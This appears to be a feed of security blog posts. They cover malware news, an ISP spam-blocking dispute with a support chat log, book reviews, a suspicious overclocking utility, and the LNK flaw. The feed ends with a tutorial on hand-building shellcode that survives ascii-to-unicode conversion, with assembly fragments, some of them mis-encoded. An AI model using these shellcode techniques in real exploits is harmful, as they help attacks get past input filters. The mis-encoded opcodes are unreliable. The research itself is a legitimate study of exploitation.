I really don’t know who is more ignorant here, the city authorities “protecting” the computers, or the journalist writing up the story …

If you know anything about the technology, this is howlingly funny (or, it would be, if it weren’t so sadly representative …)

“Officials at Nanaimo city hall are desperately working to find out how a virus attacked their computer system Wednesday afternoon.”

(Oh, oh!  Pick me!  I can tell you!  You didn’t tell people NOT TO CLICK ON RANDOM ATTACHMENTS THEY GET IN STRANGE EMAIL MESSAGES AND SUPPOSED E-CARDS!!!)

“Per Kristensen, director of information and technology, said he was shocked by how quickly the virus infected the system.

“The first time anyone anywhere in the world noticed this new virus was on [March 15] and then it hit us on the 16th,” he said Thursday.”

(How many new viruses are “created” every day, these days?)

“People can be assured that all their information is secure. Protection of their personal information is a priority. The city’s system won’t be turned on until we are confident we have this solved,” he said.

(Ummm, how are you going to clean up the computers if they are turned off?)

“Kristensen said the virus is so new, it has no signature that security devices can recognize.”

(Let me guess: a certain antivirus in a yellow box couldn’t recognize it, so you figure that nobody can, right?)

“We’ve got multiple levels of protection and firewalls, but nothing recognizes this.”

(Yeah, firewalls do a GREAT job against viruses …)

“We may have to shut down throughout the weekend and we won’t put the system back up until we know we have this under control. And right now, we don’t know how long that will be.”

(Based on this, I’m not holding my breath …)

By now people are starting to hear that RSA has been hit with an attack.  Reports are vague at best, and we have very little idea how this may affect RSA customers and security in general.  But I’d like to opine about a few points.

First, we, in the profession of information security, are still not taking malware seriously enough.  Oh, sure, most people are running antivirus software.  But we don’t really study and understand the topic.  Malware gets extremely short shrift in any general security textbook.  Sometimes it isn’t mentioned at all.  Sometimes the descriptions are still based on those long-ago days when boot-sector infectors ruled the earth.  (Interesting to see that they are coming back again, in the form of Autorun and Autoplay, but that’s simply another aspect of Slade’s Law of Computer History.)  Malware has gradually grown from an almost academic issue to a pervasive presence in the computing environment.  It’s the boiling frog situation: the rise in threat has been gradual enough that we haven’t noticed it.

Second, we aren’t taking security awareness seriously enough.  These types of attacks rely primarily on social engineering and malware.  Security awareness works marvelously well as a protection against both.  RSA is a security corporation: they’ve got all kinds of smart people who know about security.  But they’ve also got lots of admin and marketing people who haven’t been given basic training in the security front lines.  For a number of years I have been promoting the idea that corporations should be providing security awareness training.  Not just to their employees, but to the general public.  For free.  I propose that this is not just a gesture of goodwill or advertising for the companies, but that it actually helps to improve their overall security.  In the modern computing (and interconnected communications) environment, making sure somebody else knows more about security means that there is less chance that you are going to be hit.

(Third, I really hate that “APT” term.  “Advanced Persistent Threat” is pretty meaningless, and actually hides what is going on.  Yes, I know that it is embarrassing to have to admit that you have been tricked by social engineering [which is, itself, only a fancy word for "lying"] and tricked badly enough that somebody actually got you to run a virus or trojan on yourself.  It’s so last millennium.  But it’s the truth, and dressing it up in a stylish new term doesn’t make it any less so.)

I seem to be back on the air.

A few observations over this whole affair:

(Sorry, I’ve not had time to put these in particular order, and some of the point may duplicate or relate …)

1) I still have absolutely no idea why Shaw cut me off.  They keep blaming Spamhaus, but the only links they offer me as evidence clearly show that there is no “bad reputation” in the specific IP address that I am currently using, only a policy listing showing one of Shaw’s address ranges.

2) I got absolutely no warning from Shaw, and no notice after the fact.

3) Shaw’s spam filtering is for the birds.  Today I got two messages flagged as spam, for no clear reason I could see.  They were from a publisher, asking how to send me a book for review.  The only possible reason I could see was that the publisher copied three of my email addresses on the same message.  A lot of people do that, but it usually doesn’t trip the spam filter.  Today it did.  (Someone else with Shaw “service” tried to send out an announcement to a group.  Since he didn’t have a mailing list server, he just sent out a bunch of messages.  Apparently that got *his* account flagged as spamming.)  I also got the usually round of messages from security mailing lists tagged as spam: Shaw sure has something against security.  And at least one 419 scam got through unflagged today, despite being like just about every other 419 in the world.  (Oddly, during this period I’ve noted a slight uptick in 419s and phishing in general.)

4) Through this episode I had contact with Shaw via email, phone, “live chat,” and Twitter.  I follow ShawInfo and Shawhelp on Twitter.  On Twitter, I was told to send them a direct message (DM).  I had, in fact, tried to do that, but Shaw doesn’t accept direct messages by default.  (Since I pointed that out to them, they now, apparently accept them from me.)  They sent me public messages on Twitter, and I replied in kind.  Through the Twitter account they also informed me that error 554 is “poor reputation” and is caused by sending too many emails.  They didn’t say how many is too many.  (Testing by someone else indicated something on the order of 50-100 per hour, and I’ve never done anything near that scale.)

5) The “live chat” function installs some software on your (the client) machine.  At least two of the pieces of software failed the digital signature verification …

6) The “information” I got from Shaw was limited.  The first (phone) support call directed me to http://www.senderbase.org/senderbase_queries/detailip?search_string=70.79.166.169  If you read the page, the information is almost entirely about the “network” with only a few (and not informative) pieces about the IP address itself.  (I did, separately, confirm that this was my IP address.)  The bulk of the page is a report on addresses that aren’t even in the same range as I am.  About halfway down the right hand side of the page is “DNS-based blocklists.”  If you click the “[Show/Hide all]” link you’ll notice that four out of five think I’m OK.  If you click on the remaining one, you go to http://www.spamhaus.org/query/bl?ip=70.79.166.169  At the moment, it shows that I’m completely OK.  At the time I was dealing with Shaw, it showed that it’s not in the SpamHaus Block List (SBL) or the XBL.  It was in the PBL (Policy Block List), but only as a range known to be allowed to do open sending.  In other words, there is nothing wrong with my IP address: Shaw is in the poop for allowing (other) people to send spam.

7) The second (live chat) support call sent me to http://www.mxtoolbox.com/SuperTool.aspx?action=blacklist%3a70.79.166.169+  Again, this page showed a single negative entry, and a whole page of positive reports.  The single negative entry, if pursued, went to the same Spamhaus report as detailed above.

At the time, both initial pages, if followed through in terms of details, led to http://www.spamhaus.org/pbl/query/PBL164253 giving, as the reason, that “This IP range has been identified by Spamhaus as not meeting our policy for IPs permitted to deliver unauthenticated ‘direct-to-mx’ email to PBL users.”  Again, Shaw’s problem, not mine.  However, that page has a link to allow you to try and have an address removed.  However, it says that the “Removal Procedure” is only to be used “If you are not using normal email software but instead are running a mail server and you are the owner of a Static IP address in the range 70.79.164.0/22 and you have a legitimate reason for operating a mail server on this IP, you can automatically remove (suppress) your static IP address from the PBL database.”  Nevertheless, I did explore the link on that page, which led to http://www.spamhaus.org/pbl/removal/  Again, there you are told “You should only remove an IP address from the PBL if (A) the IP address is Static and has proper Reverse DNS assigned to your mail server, and (B) if you have a specific technical reason for needing to run a ‘direct-to-MX’ email service, such as a mail server appliance, off the Static IP address. In all other cases you should NOT remove an IP address from the PBL.”  This did not refer to my situation.  Unfortunately, THESE TWO PAGES ARE INCORRECT.  If you do proceed beyond that page, you get to http://www.spamhaus.org/pbl/removal/form  This page does allow you to submit a removal request for a dynamic IP address, and, in fact, defaults to dynamic in the form.  It was only on the last part of the second call, when the Shaw tech gave me this specific address, that I found this out.  For this I really have to blame Spamhaus.

9) In trying to determine if, by some weird mischance, my computer had become infected, I used two AV scanners, one spyware scanner, and two rootkit scanners.  (All results negative, although the Sophos rootkit scanner could have been a bit clearer about what it had “found.”)  Of course, I’ve been in the field for over two decades.  How would the average user (or even a security professional in a non-malware field) even know that there are different types of scanners?  (Let alone the non-signature based tools.)

Well, multiple scanners say I have no malware, no spyware, and no rootkits.

http://www.mxtoolbox.com/SuperTool.aspx?action=blacklist%3a70.79.166.169+ says I’m clean except for Spamhaus.

Spamhaus shows that http://www.spamhaus.org/query/bl?ip=70.79.166.169 I’m clean and it’s Shaw that’s dirty.

Shaw’s support is as inane as ever:

GoToAssist (11:43:33):
Your representative has arrived.

Stephen – 6685 (11:43:37):
Thank you for choosing Shaw Internet Chat Support, my name is Steve.  I will be happy to help you today.Before continuing, would you please confirm your home telephone number and address so that I can bring up your account information?

[If you don't mind, I've elided this, but it's the only change I've made - rms]

Stephen – 6685 (11:44:57):
Thank you, one moment please
Stephen – 6685 (11:48:07):
from what we see on the notes, it looks like your email is being blocked to due a poor reputation which means its being blocked by spam protection companies,  im just looking into this a little further for you.

Rob Slade (11:49:16):
Do you have any idea of what that means?  When I talked to “Rowell” yesteerday, he did not know anything about anti-spam technology, and just kept handing me bafflegab.  If you do not have any knowledge in thsi area, please hand me to someone who does.
Rob Slade (11:49:46):
I should let you know that I *do* know what I’m talking about: look up “Robert Slade” on Wikipedia.

Stephen – 6685 (11:49:48):
your being blocked by spamhaus
Stephen – 6685 (11:50:02):

http://www.mxtoolbox.com/SuperTool.aspx?action=blacklist%3a70.79.166.169+

Rob Slade (11:50:18):
I’ve written two books on viruses and malware, the first book on software forensics, and a dictionary of information security.
Rob Slade (11:50:38):
I do know what spam is, and I am well aware of antipsam technology.
Rob Slade (11:51:08):
Per looking at senderbase yesterday, my specific IP address has nothing on it.  Just Shaw’s domain range.

Stephen – 6685 (11:52:03):
you would need to go here   http://www.spamhaus.org/lookup.lasso   type in your ip address to lookup, then  click the document it shows under the listed in red, and follow the steps to get it removed from spamhaus

Rob Slade (11:52:29):

http://www.spamhaus.org/query/bl?ip=70.79.166.169

Rob Slade (11:53:04):
See that it is only listed in the PBL, and if you look up the detail on that you will see that it is only the Shaw /22 range, and not my address.
Rob Slade (11:53:49):
Going back to your original list, you will see that it is *only* listed on Spamhaus (and therefore only on the PBL), and that *all* the other sites give me a clean bill of health.
Rob Slade (11:54:19):
In addition, why did I get absolutely no warning or notice from Shaw, just had my ability to send cut off without warning?

Stephen – 6685 (11:54:27):
its not blocked by us
Stephen – 6685 (11:54:31):
thats why we couldnt give warning
Stephen – 6685 (11:54:37):
its blocked by spamhaus

Rob Slade (11:54:49):
It is your SMTP server that refuses the connectionh.
Rob Slade (11:55:00):
You can’t blame Spamhaus.

Stephen – 6685 (11:55:14):
http://www.mxtoolbox.com/SuperTool.aspx?action=blacklist%3a70.79.166.169+   please review this,  it will show you based on a search of your ip address, its listed by spamhaus-zen….

Rob Slade (11:55:52):
That is the same list as before.

Stephen – 6685 (11:56:19):
yes it is

Rob Slade (11:56:36):
As I told you, it gives me a clean bill of health, except for Spamhaus, and Spamhaus only lists the Shaw /22 range in the PBL, not my IP address specifically.

Stephen – 6685 (11:56:37):
if you look at the top.. spamhaus-zen  to the right of that it shows as listed  which means its blocked by them
Stephen – 6685 (11:57:00):
its still being listed by them, otherwise it would come up saying OK  next to spamhaus
Stephen – 6685 (11:57:16):
if you login to webmail  and try sending an email out from there, it will work because its not associated with your computer
Stephen – 6685 (11:57:30):
its not working on your computer because your ip  address is blocked by spamhaus

Rob Slade (11:57:44):
Yes, and if you look at the detail, you will see that I am *not* lsited in the SBL, *not* listed in the CBL, and *only* listed in the PBL, and if you look at the detail for *that* you will see that it is *Shaw* that violates, not me.
Rob Slade (11:58:37):
Here. chew on these: http://is.gd/VbjOIh http://is.gd/ogefIX

Stephen – 6685 (11:59:31):
im not sure what i am suppose to be seeing in those links..   Error establishing a database connection
Stephen – 6685 (12:00:07):
http://www.spamhaus.org/pbl/query/PBL164253  from there, you will need to follow the steps from clicking on remove an ip from pbl

Rob Slade (12:01:20):
In the meantime, I will be writing up more blog posts on how Shaw has inconsitent spam filtering, does not say what kind of spam filtering it does do, has a weird relationship with the blacklisting outfits.
Rob Slade (12:02:09):
Obviously you have not read the page you sent me.  This is the procedure only if you are running an email server (MTA) yourself.  I don’t.  You guys do.

Stephen – 6685 (12:05:15):
yes, from the report, its showing that its being blocked due to not using smpt authentication, that gets addressed from our side, where we communicate with spamhaus to get that resolved, however also by having you follow the link from the remove my ip address can usaully help get it resolved quicker.
Stephen – 6685 (12:06:12):
it is blocked by spamhaus, not us, which is something that will get looked into, if it was just being blocked by us, we could easily resolve it for you, however because its being blocked by a 3rd party, it will take some time, in the meantime you can use webmail to send and receive emails

Rob Slade (12:06:19):
How so?  I don’t run an SMTP server, so I can’t give them full info in filling out that form.
Rob Slade (12:07:06):
Besides, it’s not a static address.
Rob Slade (12:07:45):
Obviously you do not know what you are talkign about.  Are you going to put me through to someone who does?

Stephen – 6685 (12:08:08):
yes i do know what i am talking about Rob

Rob Slade (12:08:45):
Then how come you are asking em to fill out a form when the instructions specifically state not to do it unless this is a static IP address and I am running my own mail server?
Rob Slade (12:09:36):
http://www.spamhaus.org/pbl/removal/ “You should only remove an IP address from the PBL if (A) the IP address is Static and has proper Reverse DNS assigned to your mail server”

Stephen – 6685 (12:09:37):
i am just looking to see what more we can do on this right now, i will be a couple minutes.

As noted, Shaw is not very helpful with spam.  I’ve been getting spam from Marlin Travel, and from a band of people selling recuriting seminars, for a number of years.  I have been reporting this spam (to Shaw, and their supposedly automated spam filters) on at least a weekly basis for years.  Occasionally they deign to mark one of the messages as spam, but not on anything like a consistent basis.

Spam filtering is not transparent.  You can turn it on, or off.  You can have the spam go to the bit bucket, or get flagged.  There are no other options, and you have no information on how it works (or doesn’t).  (Heck, Vancouver Community Net [formerly Free-Net] does better than that.)

On my non-support call with Shaw, the agent did correctly identify the IP address I am (currently) using.  I have no idea when last it was switched.  Looking it up on senderbase is not supremely informative: there doesn’t seem to be any information on the address itself, other than the fact that it’s not in the SpamHaus Block List (SBL) or the XBL.  It is in the PBL (Policy Block List), but only as a range known to be allowed to do open sending.  In other words, there is nothing wrong with my IP address: Shaw is in the poop for allowing (other) people to send spam.

Meantime I have confirmed that, as I already knew, there is nothing malware or spam related on my machine.  Nothing that MSE detects.  Nothing that Vipre detects.  Nothing that Spybot detects.  At the moment I’m running the Sophos rootkit detector, and F-Secure’s Blacklight.  They haven’t found anything either.  I am, of course, morally certain that Shaw was lying to me about the possibility, but, unlike them, I’m not arrogant enough not to check.  I was right: they are idiots.  And, with their non-support, have cost me a lot of valuable time checking a clean machine.  (Plus not providing the Internet service I’m paying for.)

I have had Internet access with Shaw Cable for a number of years.  I have been using the same system for at least seven years.  I’m a malware researcher, so I check my machines thoroughly and regularly.

I also know that Shaw has a very bad reputation in terms of spam.  There are a number of  systems that I cannot send email to, since Shaw connected computers, apparently, send a lot of spam and viruses.  I also know that I spend a significant amount of time every day trying to tune Shaw’s very crude spam filtering: identifying and sending them messages they have tagged as spam which are not, and sending them messages they have not tagged which are spam.

Today my wife found she couldn’t send email.  When I tried, I couldn’t either.  We are getting a message from the SMTP server #554, which has something to do with poor reputation.

I did manage to send email through Webmail, and so sent a message to Shaw’s technical support.  (Finding out, when I did so, that they changed the technical support email address in December, without telling anyone.)  They responded about three hours later.  Rowell, the person making the call, blamed everything on senderbase.org.  Rowell denied that this had anything to do with blacklisting.  He also denied that he was saying that my computer was sending any spam.  He said that if I did not send any email for the next two days, that would fix the problem.  He refused to say why there was any indication that my computer was in any way at fault, or offer any evidence that I was sending out spam or viruses.  He also refused to escalate the problem to anyone who was either higher up and could do anything, or anyone who had any technical knowledge about the problem.

Shaw is now in my dirty words file.

The next AMTSO members’ meeting is at San Mateo, California, on the 10th-11th February, just before RSA.

I’m not sure how many supporters of the Anti-Malware Testing Standards Organization there are reading this blog, as opposed to those who regard AMTSO as a club with which to beat the anti-virus industry. However, I’m pretty sure that even those who find the generation of testing guidelines documents (which constitutes most of the work at AMTSO meetings) excruciatingly boring will find some interesting material coming out of the organization in the next few weeks.

There’s more information on this year’s AMTSO meetings on the AMTSO meetings page at http://www.amtso.org/meetings.html, including a preliminary agenda.

David Harley CITP FBCS CISSP
Small Blue-Green World

BKCVAOMS.RVW   20100607

“Computer Viruses and Other Malicious Software”, Organization for
Economic Co-operation and Development, 2009, 978-92-64-05650-3
%A   Organization for Economic Co-operation and Development
%C   2 rue Andre Pascal, 75775 Paris Cedex 16, France
%D   2009
%G   978-92-64-05650-3 92-64-05650-5
%I   OECD Publishing
%O   oecdna@turpin-distribution.com sourceoecd@oecd.org
%O  http://www.amazon.com/exec/obidos/ASIN/9264056505/robsladesinterne
http://www.amazon.co.uk/exec/obidos/ASIN/9264056505/robsladesinte-21
%O   http://www.amazon.ca/exec/obidos/ASIN/9264056505/robsladesin03-20
%O   Audience i- Tech 1 Writing 1 (see revfaq.htm for explanation)
%P   244 p.
%T   “Computer Viruses and Other Malicious Software”

The executive summary doesn’t tell us much except that malware is bad, and that this report is seen as a first step in addressing the issue in a global, comprehensive manner.

Part one, entitled “The Scope of Malware,” is intended to provide background to the problem.  Chapter one, as an overview, is a random collection of technical issues, with poor explanations.  Although it is good to see that the malware situation is defined in terms that are more up-to-date than those in all too many security texts, the lack of foundational material provided by the authors will necessarily limit the perception of the issue for those readers who have not done serious research themselves.  Various stories of attacks and payloads (not all related to malware) are listed in an equally disjointed manner in chapter two.  There are numerous errors, including in simple aspects like arithmetic.  (20 million is not “5 times” one million.)   The explanation of why we should be concerned, in chapter three, boils down to the fact that the net is important, and malware imposes costs.

Part two turns to the economics of malware.  Chapter four, while it promises to deal with cybersecurity and economic incentives, merely states that security is hard.  Chapter five does deal with economic factors influencing decisions of key players on the Internet, but does so only on the basis of an opinion survey, rather than any measured costs or benefits.  Descriptions of different types of economic situations are given in chapter six, but a final set of “findings” doesn’t seem to have much background support.

Part three is supposed to contain recommendations about actions to take, or policies to follow, to address the malware issue.

Unfortunately, this work does not have sufficient technical depth on areas of malware to contribute to the literature.  The concept of addressing the economic aspects is interesting, but is not sufficiently fulfilled.  Overall, this text has nothing to add to existing information.

copyright, Robert M. Slade   2010     BKCVAOMS.RVW   20100607

This was sent to me by a friend who wanted to stay anonymous:

There’s a utility called SetFSB which tweaks the clock speed for overclocking stuff.
It was written in Japan, and is used for many years already.
Recently it came to me that I can speed up my old machine by 25% so I dl’ed it as well,
however, when running, I discovered that upon termination, the .exe creates 2 files,
1 batch file and 1 executable.
The batch file is being spawned, and starts a loop trying to delete the original executable, and continues indefinitely until it’s deleted. after that it will rename the new .exe to the be the same name as the old one.
Now, isn’t that suspicious?
I’ve tried googling it, and just found 1 reference in PCTool’s ThreatFire, but the shmucks just got the threat and couldn’t see the .exe and .bat, so they just decided it’s a false alarm and whitelisted the utility.
I thought it would be a good idea to contact the author, give him a chance to explain, and this is message train, which I find very funny:

there’s a uility called SetFSB which tweeks the clock speed for overclocking stuff.
It was written by some Jap, and is used for many years already.
Recently it came to me that I can speed up my old machine by 25% so I dl’ed it as well,
however, when running, I discovered that upon termination, the .exe creates 2 files,
1 batch file and 1 executable,
the batch file is being spawned, and starts a loop trying to delete the original executable, and continues indefinitely until it’s deleted. after that it will rename the new .exe to the be the same name as the old one.
Now, isn’t that suspicious?
I’ve tried googling it, and just found 1 reference in PCTool’s ThreatFire, but the shmucks just got the threat and couldn’t see the .exe and .bat, so they just decided it’s a false alaram and whitelisted the utility.
I thought it would be a good idea to contact the author, give him a chance to explain, and this is message train, which I find very funny:

ME>>>

Dear Mr.

Why after exiting SetFsb, it will create a .bat and new .exe
the .bat will loop to try delete the old .exe, and rename the new .exe to old .exe ?

Thanks!

HIM>>>

Hi,

Yes,

abo

ME>>>

Hello.

Yes… good…

but WHY???
is it a VIRUS?

thanks!

HIM>>> (here comes the good part )

I do not have a lot of free time too much.
Why do you think that i support you free of charge?

ME>>>

to make viruses?

HIM>>> (this is the original font color and size he used!!!)

I do not have a lot of free time too much!

ME>>> (trying to hack his japanese moralOS v0.99)

Please, dear Abo,

You must understand. People start to be VERY worried about your software,
because it behave like a virus.
If you will not give a good explanation to WHY it behave like this,
then people will stop using it, and stop trusting you forever.
Then your name will become bad, and you will have a lot of shame.
I only try to help you.

I hope you understand!

HIM>>>

It is unnecessary. Please do not use SetFSB if you are worried.

Personally, I’m not sure who’s more weird: my friend, overclocking his computer in 2011, or the Japanese programmer not willing to explain if his downloadble program is a Trojan or not.

Crazy busy, this time of year, isn’t it?  That’s why I haven’t gotten back to this until now.

(Mind you, last Sunday, at church, the kids put on this play, the point of which was that the “busy” parts of Christmas often aren’t the most important aspects.  The tagline to the play was that you should be busy about the right things, not the wrong ones.  And we’ve mostly been busy with the twins.

For example, #2 Daughter was heavily involved in the local Atom hockey tournament, since #3 Grandson was in one of the teams.  So, we pulled extra babysitting time while she had to be running things, and he *didn’t* have to be there.

The famous Coquitlam Atom Boom Boom Puck Jam Hockey tournament was won, Tuesday, by the Coquitlam Chiefs C1 team in an exciting finish.  Tied after regulation time [with full 15 minute periods, rather than the normal Atom 12, with the third period shortened if anything in the game goes overtime], and still tied after five minutes of 4 on 4 sudden death overtime, the final was won in the second-to-last shot of a shoot-out.

Because of conflicting appointments, Grandpa (of #6, right wing forward) had to travel an hour and a half, taking the Skytrain and bus out to the rink, but is still chuffed 

But the disappointments, of which I speak, had to do with computers.  Part of the pain of buying new stuff, is that things you thought you could rely on, well, it turns out you can’t, anymore.

One of them is NOD32.  Eset does make a good product, although it tends to be fairly greedy for cycles, while operating, and a bit arrogant in terms of what it tells you.  So, when a family member was in trouble over an infection (always embarrassing when your own family doesn’t take precautions, isn’t it?) I had no hesitation in applying NOD32 to try and clean it up.  Well, the machine is older, and slow.  And, hasn’t been updated in a while, so I was trying to fix that, too.  NOD32, even after finishing it’s scan, was interfering with the update process.  So much so, that it got to the point where we thought the machine was unrecoverable.

We did get it back in operation.  (And, first thing, removed NOD32.)  But it’s disappointing when a trusted tool bites you.

(Speaking of the which, I’ve spoken before about MSE, and even mentioned some of the performance degradation it can cause in older machines.  I must say, that, in some recent experiences, I’m more and more impressed with it as a means of rescuing computers that have been infected.)

More closely related to the new computers, one of my favourite places to get computer equipment, over the years, has been a western Canadian drugstore chain called London Drugs, similar (for those of you in the States) to Walgreens, although sometimes London Drugs is closer in scale to Target.  For twenty years I have been sending people to them for good advice, knowledgable staff, and decent prices.

Well, one of the computers I bought, this time around, is a Mac.  I’m not familiar with Macs, so I was relying on their advice.  Actually, the advice that I got from one staffer was quite good.  But, when I went to actually buy the machine, I got it home and found that what I had brought home was not what I’d ordered.  Which reminded me that the last time I needed to get a printer cartridge, again, they gave me the wrong one.  (There is also that fact that, in relying on their advice over what I needed, they sold me some completely unnecessary software, when the function I wanted is already built in to the Mac.)
Overall, I think they still are a reasonably decent place to get stuff, but, obviously, they may be victims of their own success.  Getting a bit careless, perhaps.  So, equally obviously, I can’t just rely on them any more, and will have to be careful about who I send there, as well.
Like I  said, a bit of a disappointment …

Aviram said in a recent blog about Stuxnet and SCADA here:

After that, we get to theorize on who’s behind it and who is the target. What’s your guess?

And sure enough, half the security world has done just that, and the rest will be talking about it at Virus Bulletin next week. Good fun, maybe, if you don’t think too hard about some of the political implications, but I’m not sure it’s been productive or useful. Which is why I blogged today here.

I’d love to cover the same ground again here, but frankly I’m just too dispirited…

David Harley CITP FBCS CISSP
ESET Senior Research Fellow

BKMTHSEC.RVW   20091221

“The Myths of Security”, John Viega, 2009, 978-0-596-52302-2, U$29.99/C$37.99
%A   John Viega viega@list.org
%C   103 Morris Street, Suite A, Sebastopol, CA   95472
%D   2009
%G   978-0-596-52302-2 0-596-52302-5
%I   O’Reilly & Associates, Inc.
%O   U$29.99/C$37.99 800-998-9938 fax: 707-829-0104 nuts@ora.com
%O  http://www.amazon.com/exec/obidos/ASIN/0596523025/robsladesinterne
http://www.amazon.co.uk/exec/obidos/ASIN/0596523025/robsladesinte-21
%O   http://www.amazon.ca/exec/obidos/ASIN/0596523025/robsladesin03-20
%O   Audience i Tech 1 Writing 1 (see revfaq.htm for explanation)
%P   238 p.
%T   “The Myths of Security”

The foreword states that McAfee does a much, much better job of security than other companies.  The preface states that computer security is difficult, that people, particularly computer users, are uninformed about computer security, and that McAfee does a much better job of security than other companies.  The author also notes that it is much more fun to write a book that is simply a collection of your opinions than one which requires work and technical accuracy.

The are forty-eight “chapters” in the book, most only two or three pages long.  As you read through them, you will start to notice that they are not about information security in general, but concentrate very heavily on the antivirus (AV) field.

After an initial point that most technology has a poor user interface, a few more essays list some online dangers.  Viega goes on to note a number of security tools which he does not use, himself.  He then argues unconvincingly that free antivirus software is not a good
thing, unclearly that Google is evil, and incompletely that AV software doesn’t work.  (I’ve been working in the antivirus research field for a lot longer than the author, and I’m certainly very aware that there are problems with all forms of AV: but there are more forms of AV in heaven and earth than are dreamt of in his philosophy.  By the way, John, Fred Cohen listed all the major forms of AV technology more than twenty-*five* years ago.)  The author subsequently jumps from this careless technical assessment to a very deeply technical discussion of the type of hashing or searching algorithms that AV companies should be using.  And thence to semi-technical (but highly opinionated) pieces on how disclosure, or HTTPS, or CAPTCHA, or VPNs have potential problems and therefore should be destroyed.  Eventually all pretence at analysis runs out, and some of the items dwindle down to three or four paragraphs of feelings.

For those with extensive backgrounds in the security field, this work might have value.  Not that you’ll learn anything, but that the biases presented may run counter to your own, and provide a foil to test your own positions.  However, those who are not professionals in the field might be well to avoid it, lest they become mythinformed.

copyright Robert M. Slade, 2009    BKMTHSEC.RVW   20091221

The recently discovered LNK exploit; using the way Microsoft parses link or shortcut icons for display in order to get something else executed; may be a tempest in a teapot.  It is technically sophisticated, but so far we don’t appear to have seen it used widely.

Probably a good thing.

This exploit could be used in a wide variety of ways.  You can use it in removeable media, so that any time you shove a CD in a drive, or connect a USB stick/thumb drive (or any other USB device, for that matter) to a computer, it results in an infection or some malicious payload.

And remember that OLE stands for object *LINKING* and embedding.  Since it is trivially easy to embed a virus in any Windows OLE format data file, it should be just as easy to create malicious links in any such files.

Microsoft’s own information on the issue seems to indicate that there is a related, but separate, issue with Microsoft Office components, related to Web based activities.  (By the way, when accessing that site, the information about how to protect against the exploit is hidden under the “Workarounds” link, rather than being explicit on the page.)

Some of the potential effects are discussed by Randy Abrams at http://blog.eset.com/2010/07/19/it-wasn%E2%80%99t-an-army

We’ve got a new law coming up in Canada: C-32, otherwise known as DMCA-lite.

Lemme quote you a section:

29.22 (1) It is not an infringement of copyright for an individual to reproduce a work or other subject-matter or any substantial part of a work or other subject-matter if
[...]
(c) the individual, in order to make the reproduction, did not circumvent, as defined in section 41, a technological protection measure, as defined in that section, or cause one to be circumvented.

Now, of course, if you want to examine a virus, or other malware, you have to make a copy, right?  So, if the virus writer has obfuscated the code, say by doing a little simple encryption, obviously he was trying to use a “technological protection measure, as defined in that section,” right?  So, decrypting the file is illegal.

Of course, it’s been illegal in the US for some years, now …

My initial, and superficial, review of MSE is still sparking all kinds of comment.

Today it decided to update itself.  Didn’t ask, of course.  It just tied up the computer for about half an hour.  I was able to get some stuff done, as long as I was willing to wait ridiculous amounts of time for responses.

This post is a followup on my previous post on KISS shellcoding and exploitation. Like before this is part of the job I do for SecuriTeam’s SSD. Those that are not aware of the project its aim is to give researchers compensation for their researcher efforts, compensation of course being money not just fame and glory
The most common and classic shellcode char restrictions is “zero tolerance”. this can be solved in a verity of different methods. ranging from substitution to polymorphic escape decoders. Solving zero-tolerance is a very useful and thought-provoking problem, however provides a limited amount of fun:). especially once a basic set of solutions has been developed.

Let’s have a look at slightly more challenging problem – can we write shellcode that contains a null char at every other byte, and *only* every other byte, for e.g. s\x00h\x00e\x00l\x00l\x00c\x00o\x00d\x00e0

This can happen if our shellcode were to pass through a call to MultiByteToWideChar() or similar function. This is often encountered in browser bugs (especially DOM and/or scripting).

Some work has been done on this subject, namely a method was described by ngss reasercher Chris Anley. This method was coined “Venetian Blinds” or ”The Venetian exploit”. The method I suggest here is similar, but slightly different in that it does not make as many assumptions and presents a more theoretical approach. This work is an original unrelated effort.

Let us get to it.

Enumerating the methods we can use to write ugly ascii-to-unicode shellcode we find many are similar to regular zero-tolerance or ascii shellcode methods.

We can decode in-place, copy, byte-substitute. These methods will become more clear as you read. In some cases it will be necessary to find eip/getPC.

This also can be done in several ways, similarly to shown in my previous post, but differently( Try encoding FSTENV with null bytes, email me if you succeed

It will take many pages to thoroughly cover all of these methods and so I’ll start with the simplest copy method.

Instead of just presenting the final result, I will walk through my thought process working on this. In this post I present several different trials at shellcode, some of which are not immediately useful. This will allow you to better understand the intricacies shellcode-restriction, and get a feel for the different problems I faced.

Let’s copy our code somewhere. If we were to decode in-place, we would essentially write the same code, as well as extra getPC code.

Not as easy as it sounds. let us start from building restriction-compliant basic-blocks which can br used later. These blocks shall suffice:
1) set register
2) string operation
3) branch
4) glue block

These translate to:

1) mov reg32, imm32
2) mov [reg32],imm8
inc reg32 # imm8 !=0
3) jmp/call reg32
4) a “glue block” that can be use between every two blocks, and between two compliant opcodes. This is a compliant block that starts and ends with a null byte. we’ll mark it *GB.

if we want to get a bit fancier we may need:
3) pop reg32
4) mov [reg32],imm16 # imm16 bytes not equal 0
inc reg32
inc reg32

(U) basic block number one: setting a register – attempt 1.0
the following opcode:
mov ecx, 0×11223344
decodes like this:
B9 44332211

which of course is not very helpful to us. The best we can do with our restriction and this basic opcode is:
B9 00330011 == mov ecx, 0×11003300

this is not very useful. we want to be able to put an arbitrary value into r32. let’s divide in to two parts by bytes:

two lower bytes(“3rd and 4th”):let’s start by setting the two lower bytes. this is easy

*GB ; zero-out ecx
push 0
pop ecx

mov edx,77007700 BB00770077 ; use edx as help-reg

*GB
add ch,dh – 00F5 c
mov edx,66006600 – BB00660066.

*GB
add cl,dh – 00F1

This is a good method for the lower bytes. let’s call it “set (cx, 0×1122)”.

Those readers with a keen eye may notice that assembling these opcodes may not result in compliant shellcode.

This is because different byte-sequences may represent the same opcode. x86 opcodes are built of micro-codes or U-codes(with the greek letter mewh). Every Ucode performs a very basic operation. Several of these are dubbed “opcode”. Different sequences of Ucodes may result in the same end and therefore be functionally-equivalent, usually an assembler will choose the faster one.

topmost two bytes:
in order to set the topmost byte we can:

mov ecx,66006600 – BB00660066.

In order to set the topmost byte to zero we can: zero out the whole r32, later setting byte’s 3&4 . this is done by replacing our first opcode with the sequence:
push 0 – 6A00
pop ecx – 59

onwards.

we are now able to set the 1st,3rd, and 4th bytes of a register. how will we set the second? if the value needed is very low or very high we could:
set (cx, 0xFFFF)
*GB

inc ecx – 41
*GB
set (cx, 0xFFFF)
etc.

or

set (cx, 0×0000) ; this is not trivial, but easy
*GB
DEC ecx – 41

etc.

This method is not very space-conservative. let’s try finding a better method.

And now for something completely different – let’s find a better method. This time the process will include taking a peak at the intel x86 reference manual (I used the xeon manual) in search for interesting opcode encodings.

(U) basic block number one: attempt 2.0 – setting the top two bytes.

this time, we’ll try using program memory, specifically – the stack. this may a good method because many stack operations are single-byte. this may be bad, if sp points somewhere unwritable when the shellcode is running(but can be adapted).

